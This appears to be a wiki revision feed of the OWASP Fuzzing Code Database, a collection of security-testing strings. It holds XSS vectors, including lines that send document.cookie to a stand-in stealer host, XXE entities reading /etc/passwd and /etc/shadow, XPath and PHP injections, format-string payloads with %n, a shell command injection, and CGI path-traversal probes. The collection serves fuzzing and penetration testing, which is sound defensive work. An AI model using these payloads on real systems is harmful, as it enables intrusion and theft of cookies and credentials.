&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80081</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80081"/>
				<updated>2010-03-17T21:14:38Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
